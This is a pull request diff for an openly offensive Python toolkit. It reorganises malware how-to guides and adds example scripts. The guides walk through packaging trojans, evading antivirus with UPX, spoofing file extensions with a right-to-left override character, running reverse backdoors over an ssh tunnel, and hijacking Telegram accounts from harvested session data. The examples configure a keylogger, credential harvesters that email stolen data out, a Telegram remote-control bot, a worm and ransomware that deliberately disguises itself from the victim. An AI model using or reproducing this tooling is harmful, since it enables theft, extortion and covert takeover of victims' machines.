Merge pull request #12 from dmdhrumilmistry/generate-executables

Create Classes for evil files modules

pyhtools/malwares/Trojans/HowToCreateTrojanPackage.md → HowTo/Malwares/CreateTrojanPackage.md

@@ -1,37 +1,44 @@
-# Packaging Trojans with any file.
-
- ## Using App Data
+# Packaging Trojans with any file
+
+## Using App Data
+
+### Steps
 
- ### Steps
 - Install Pyinstaller
 - Downloading Icon :
-    - Download Icon from [IconFinder](https://iconfinder.com/)
-    - set filters to free and choose high resolution.
-    - download icon
+  - Download Icon from [IconFinder](https://iconfinder.com/)
+  - set filters to free and choose high resolution.
+  - download icon
 - Changing downloaded png to ico
-    - Visit [ICO convert](https://icoconvert.com/) or [OnlineConvert.com](https://image.online-convert.com/convert-to-ico)
-    - Upload image
-    - choose desired settings
-    - convert and download ico file
+  - Visit [ICO convert](https://icoconvert.com/) or [OnlineConvert.com](https://image.online-convert.com/convert-to-ico)
+  - Upload image
+  - choose desired settings
+  - convert and download ico file
 - If using requests use 2.5.1
-    ```
-    $ pyinstaller --add-data "path_to_front_file;." --icon "full_icon_path" --one-file --noconsole -n "name_of_output_file" "path_to_reverse_tcp.py"
+
+    ```bash
+    pyinstaller --add-data "path_to_front_file;." --icon "full_icon_path" --one-file --noconsole -n "name_of_output_file" "path_to_reverse_tcp.py"
     ```
 
 ### Bypassing AV using UPX
+
 - Download [UPX](https://github.com/upx/upx/releases/tag/v3.96)
-- Extract files 
+- Extract files
 - Use UPX to compress pyinstaller generated executable
 - Syntax:
-    ```
-    $ ./upx "full_path_of_executable" -o "full_path_of_compressed_executable"
+
+    ```bash
+    ./upx "full_path_of_executable" -o "full_path_of_compressed_executable"
     ```
 
 ### Spoofing File Type
+
 - Copy Right to left override character (U+202E). copy from below or from [unicode-explorer website](https://unicode-explorer.com/c/202E)
-```
-‮ 
-``` 
+
+  ```string
+  ‮ 
+  ```
+
 - file_name-`(type_everything_in_reverse_order)` and paste copied character after `-`.
 
   - eg : sample_pdf-`fdp.exe`
@@ -46,5 +53,6 @@
   - spoofed file_name : spoofed_al`exe.pdf`
   - actual file_name : spoofed_al`fdp.exe`
 
-### Send File to victim 
-- Send file to victim through using attacks or social engineering.
+### Send File to victim
+
+- Send file to victim through using attacks or social engineering.

pyhtools/malwares/reverse_backdoor/HTTP/HowToUse.md → HowTo/Malwares/ReverseBackdoor-HTTP.md

@@ -5,14 +5,18 @@
 ## Usage
 
 ### Attack over LAN
+
 - Start listener
+
     ```bash
     python3 listener.py
     ```
+
     > Default port = 8080
     > Change port in `listerner.py` on line 33 if another service is using 8080 port
 
 - Edit `IP` and `PORT` values in `backdoor.py` on line 48
+
     ```python
     IP = 'attacker_local_ip'
     PORT = attacker_port  # 8080
@@ -21,35 +25,41 @@
 ### Attack over the internet
 
 - Start a ssh tunnel on attacker's device.
+
     ```bash
     ssh -R 80:localhost:<listener_port>
     ```
-    > Note : Replace <listener_port> with port on which local server is running
 
+    > Note : Replace <listener_port> with port on which local server is running
 
 - Copy link that will be available after successfully tunelling between attacker's machine and localhost.run server.
+
     ```
     example : <random_characters>.localhost.run
     ```
 
 - Start Listener on your localhost using
+
     ```bash
     python3 listener.py
     ```
 
 - Replace copied link in `backdoor.py` on line 48.
+
     ```python
     IP = '<random_characters>.localhost.run'
     ```
 
 - Use social engineering to make user to execute the python file or created standalone executable/trojan. Use python to run backdoor.py script.
+
     ```
     python3 backdoor.py
     ```
 
 - Now use post exploitation tools to gain admin priviliges
 
-# Tested on 
+# Tested on
+
 - Windows 10
 - Debian based OSes
-- Android Termux
+- Android Termux

pyhtools/malwares/reverse_backdoor/TCP/HowToUse.md → HowTo/Malwares/ReverseBackdoor-TCP.md

@@ -1,32 +1,38 @@
 
+# TCP backdoor
+
 ## Change Values according to need
+
 - change ip and port to your desired values in listener.py and reverse_backdoor.py
 
 - run listener.py on attackers machine.
 
 - run backdoor.py on victims machine.
 
 ## Create a executable\standalone
+
 - pip3 install pyinstaller
 
-- Creating executable with console: 
+- Creating executable with console:
+
     ```bash
-    $ pyinstaller python_file.py --onefile
+    pyinstaller python_file.py --onefile
     ```
 
-- Creating executable without console: 
+- Creating executable without console:
+
     ```bash
-    $ pyinstaller python_file.py --onefile --noconsole
+    pyinstaller python_file.py --onefile --noconsole
     ```
 
-
-> note : noconsole works when we're not using stream like stdin, stdout, stderr, etc. 
+> note : noconsole works when we're not using stream like stdin, stdout, stderr, etc.
 > If we're using STDI/O streams then we have to set then to DEVNULL = open(os.devnull, 'wb') then set IOstreams to DEVNULL
 > if using subprocess.check_output then use subprocess.check_output(command, stderr=subprocess.DEVNULL, stdin=subprocess.DEVNULL).
 > here stdio is being handled by check_output. so no need to handle stdio.
 
 ## Create windows executable on linux
-- Install Wine 
-- Download Python for windows 
-- Install Downloaded python for windows using wine on linux 
+
+- Install Wine
+- Download Python for windows
+- Install Downloaded python for windows using wine on linux
 - the other commands remain the same to create executable.

HowTo/Malwares/SendEmail.md

@@ -0,0 +1,22 @@
+# Send Email Requirements
+
+## Steps
+
+- Turn on 2FA
+- Go to GoogleAcc->Security->AppPassword->Custom
+- Copy generated key and use that as password
+
+## Use malwares.utils module
+
+```python
+from pyhtools.malwares.utils import send_mail
+
+send_mail(
+    email = '[email protected]', 
+    password = 'your',
+    receiver_mail = 'emails_separated_by_comma',
+    message = 'your message',
+    smtp_server = 'smtp.gmail.com',
+    smtp_port= 587
+)
+```

pyhtools/malwares/telegram_data_harvester/HowToUse.md → HowTo/Malwares/TelegramDataHarvester.md

@@ -1,13 +1,15 @@
 # How to use Telegram Data Harvester
 
 ## Steps
+
 - Create a Gmail App Password
 - update telegram_data_harvester.py lines 64 and 65 with your gmail and App Password
 - Create a executable file or trojan
 - Send to the target
 - You will receive an email with telegram data as a zip when target executes the program/trojan.
 
 ## How to use their account
+
 - Extract tdata folder from the zip file
 - go to your installed telegram desktop location
 - replace your tdata file with the zip tdata folder

pyhtools/malwares/TelegramRemoteCodeExecutor/HowToUse.md → HowTo/Malwares/TelegramRemoteCodeExecutor.md

@@ -1,12 +1,11 @@
 # How to use Telegram Remote Code Executor
 
-- Get Token for bot from [Telegram BotFather](https://t.me/botfather) and update `API_KEY` on line 7 of `TelegramRemoteCodeExecutor.py` 
-- Get Attacker's User ID from [UserInfoBot](https://t.me/userinfobot) or run TelegramRemoteCodeExecutor.py and use `/start` command to get user id and then update `CHAT_ID` on line 8 of `TelegramRemoteCodeExecutor.py` 
+- Get Token for bot from [Telegram BotFather](https://t.me/botfather) and update `API_KEY` on line 7 of `TelegramRemoteCodeExecutor.py`
+- Get Attacker's User ID from [UserInfoBot](https://t.me/userinfobot) or run TelegramRemoteCodeExecutor.py and use `/start` command to get user id and then update `CHAT_ID` on line 8 of `TelegramRemoteCodeExecutor.py`
 - Create trojan/malware using `pyinstaller` and send it to victim
 - When victims runs malware program, attacker will be notified through the bot on telegram
 - Attacker can use commands to exploit the machine remotely through Telegram over the internet
 
-
 | Command |  Description | Params |
 |:-----:|:--------:|:-------: |
 | /start   | starts interaction with the bot and returns command issuer details  | None |

HowTo/Malwares/WirelessProfileHarvester.md

@@ -0,0 +1,7 @@
+# Wireless Profile Harvester
+
+## HOW to use
+
+- Read [HowTo/Malwares/SendEmail.md](./SendEmail.md) to and use app password
+- Update email id and password (app password)
+- Create exe: pyinstaller.exe --onefile --icon='icon_path' -n 'name_of_file' .\wireless_profile_harvestor.py

examples/Detectors/ARP-SpoofDetector.py

@@ -0,0 +1,13 @@
+from argparse import ArgumentParser
+from pyhtools.detectors.arp_spoof_detector import SpoofDetector
+
+parser = ArgumentParser()
+parser.add_argument('-i', '--interface', dest='interface',
+                    help='checks for specific interface')
+
+args = parser.parse_args()
+interface = args.interface
+
+# Create spoof detector obj
+detector = SpoofDetector(interface)
+detector.capture_packets()

examples/EvilFiles/Malwares/TelegramBackdoor.py

@@ -0,0 +1,14 @@
+from curses import start_color
+'''
+Controls the compromised machine using telegram
+'''
+import pyhtools.evil_files.malwares.telegram_remote_code_executor.TelegramRemoteCodeExecutor as evil_bot
+
+# set API_KEY and CHAT_ID before starting bot
+# Note: to find user id, start the bot, and message this bot with /start
+evil_bot.API_KEY = 'your_bot_key/token'
+evil_bot.CHAT_ID =  0 # int - attacker's user id
+
+# start bot 
+# Note: for windows create malware with runtime broker
+evil_bot.start_bot()

examples/EvilFiles/Malwares/TelegramDataHarvester.py

@@ -0,0 +1,12 @@
+from pyhtools.evil_files.malwares.telegram_data_harvester.harvester import TelegramHarvester
+
+
+tdata_harvester = TelegramHarvester(
+    sender_email='dummy_email',  # dummy email to send collected data
+    sender_passwd='dummy_email_passwd', # dummy email account password for authentication
+    server='smtp.gmail.com',  # smtp email server domain
+    port=587,  # smtp server port
+    receivers='attacker_email',  # email where harvested data will sent
+)
+
+tdata_harvester.start()

pyhtools/malwares/keylogger/dlogs.py → examples/EvilFiles/Malwares/key_logger.py

@@ -1,4 +1,4 @@
-from keylogger import KeyLogger
+from pyhtools.evil_files.malwares.keylogger import KeyLogger
 
 key_logger = KeyLogger(email='yourgmailaccount', password='yourpassword', interval_in_secs=60)
 key_logger.run()

examples/EvilFiles/Malwares/wifi-password-harvester.py

@@ -0,0 +1,13 @@
+import imp
+from pyhtools.evil_files.malwares.wireless_password_harvester.harvester import WiFiPasswordHarvester
+
+# create obj
+harvester = WiFiPasswordHarvester(
+    email='your_email',
+    passwd='email_passwd',
+    smtp_server='smtp.gmail.com',
+    smtp_port=587,
+)
+
+# start harvester
+harvester.start()

examples/EvilFiles/Ransomwares/dmsec_decrypter.py

@@ -0,0 +1,14 @@
+from pyhtools.evil_files.ransomwares.dmsec.decrypter import DMSecDecrypter
+
+print('[*] Decrypting....')
+
+# specify paths to be decrypted
+PATHS = [r'paths_to_be_decrypted', ]
+
+KEY = input('[+] Enter KEY : ')
+
+# don't pass PATHS if all the drives are to be decrypted.
+encrypter = DMSecDecrypter(KEY, PATHS)
+encrypter.start()
+
+print('[*] Decrypted...')

examples/EvilFiles/Ransomwares/dmsec_encrypter.py

@@ -0,0 +1,21 @@
+from pyhtools.evil_files.ransomwares.dmsec.encrypter import DMSecEncrypter
+
+# Print some meaningful text, so that user don't suspect program as ransomeware
+print('[*] Loading...')
+
+# Specify paths to be encrypted
+PATHS = [
+    r'path_to_be_encrypted',
+]
+
+# don't pass PATHS if all the drives are to be encrypted
+encrypter = DMSecEncrypter(
+    paths=PATHS,
+    email='yourgmailid',
+    passwd='yourapppassword'
+    smtp_server='smtp.gmail.com',
+    smtp_port=587,
+)
+
+encrypter.start()
+print('[*] Completed')

examples/EvilFiles/Worms/DirClonerWorm.py

@@ -0,0 +1,20 @@
+from pyhtools.evil_files.worms.dir_cloner import DirCloner
+
+# create obj and path
+dir_worm = DirCloner()
+path = dir_worm.get_curr_drive_folder()
+
+# set cloning directory
+dir_clone_set_status = dir_worm.set_clone_path(path)
+
+# remove print statements while creating evil files
+if dir_clone_set_status:
+    print(f"[*] Clone path : {path}")
+else:
+    print(f"[!] Failed to set new clone path {path}")
+
+# for specific folder
+dir_worm.clone_dir(times=1, start_after=0)
+
+# for specific folder and its subfolder
+dir_worm.clone_all_dirs(times=1, start_after=0, path=path)